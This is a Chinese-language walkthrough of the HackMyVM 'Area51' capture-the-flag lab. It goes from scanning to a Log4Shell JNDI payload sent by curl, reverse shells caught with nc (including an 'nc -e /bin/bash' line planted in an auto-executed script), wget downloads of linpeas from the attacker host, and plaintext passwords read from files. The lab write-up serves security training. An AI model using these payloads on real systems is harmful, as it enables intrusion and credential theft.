资讯详情

HackMyVM-Area51靶机

靶机信息

靶机地址:https://hackmyvm.eu/machines/machine.php?vm=Area51

名称:Area51(51区)

难度:中等

创作者:bit

发布日期:2021-12-24

目标:user.txt和root.txt

搭建靶机

下载完Area51.ova后,使用Oracle VM VirtualBox导入即可

注意导入!!不要钩!USB控制器,否则会出错

导入完成后,可以直接启动,开始靶机之旅

实验环境

攻击机:VMware      Kali    192.168.2.148 目标机:VirtualBox  Debian  IP自动获取

信息收集

扫描局域网内的靶机IP地址

nmap -sn 192.168.2.0/24

扫描端口,扫描目标机器开放的服务

nmap -A -p- 192.168.2.108

扫描到22(SSH)、80(HTTP)、8080(HTTP)用火狐浏览器访问80端口三个端口,192.168.2.108

佛波乐,好家伙(FBI)页面,访问8080端口,192.168.2.108:8080

发现400错误页面

扫描目录,扫描一些敏感文件等。gobuster来扫描

gobuster dir -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u http://192.168.2.108/ -x php,html,txt

扫描到一个note.txt,访问下192.168.2.108/note.txt

翻译看看

渗透测试

提示存在Log4j直接访问和使用漏洞很可能与8080端口有关Burp的插件log4j扫描看看

发现X-Api-Version:参数中存在漏洞

存在log4j漏洞,使用poc(GitHub - kozmer/log4j-shell-poc: A Proof-Of-Concept for the CVE-2021-44228 vulnerability.)拿shell

在kali机器中,log4j-shell-poc必须有目录jdk1.8.0_20文件夹的java

(https://repo.huaweicloud.com/java/jdk/8u201-b09/jdk-8u201-linux-x64.tar.gz)

git clone https://github.com/kozmer/log4j-shell-poc.git cd log4j-shell-poc python3 poc.py --userip 192.168.2.148

打开新的终端页面进行监控

nc -nvlp 9001

打开一个新的终端页面,输入刚刚payload

curl 'http://192.168.2.108:8080' -H 'X-Api-Version: ${jndi:ldap://192.168.2.148:1389/a}'

这里的终端收到了监控

发现是在docker在里面,上传一个linpeas.sh搜集下信息

kali机器下载好linpeas.sh,打开一个新的终端页面,打开远程下载服务

python3 -m http.server 7788

监控此处的终端页面下载linpeas.sh

wget http://192.168.2.148:7788/linpeas.sh

执行linpeas.sh信息收集

chmod  x linpeas.sh ./linpeas.sh

查看一些目录

cat /var/tmp/.roger,查询到roger的密码 使用ssh远程登录 ssh roger@192.168.2.108

拿到user.txt下的一个FLAG=[xxxxxx]

继续使用linpeas.sh搜集信息

wget http://192.168.2.148:7788/linpeas.sh chmod  x linpeas.sh ./linpeas.sh

发现了roger下有个kang

cat /etc/pam.d/kang,发现是kang的密码 su kang

发现kang一些奇怪的事情发生在主目录中,一份文件不断出现和消失

看起来像是kang用户创建了一个shell脚本,执行一切.sh并删除它们

echo "echo test >/tmp/test" > test.sh ls /tmp/test -l echo "nc -e /bin/bash 192.168.2.148 4444" >test.sh

打开新的终端页面进行监控

nc -nvlp 4444 python3 -c 'import pty;pty.spawn("/bin/bash")' cd root cat root.txt

成功获取到root权限下的FLAG=[xxxxx]

声明:请勿用作违法用途,请在授权情况下使用

标签: 12通用hvm10二极管

锐单商城拥有海量元器件数据手册IC替代型号,打造 电子元器件IC百科大全!

锐单商城 - 一站式电子元器件采购平台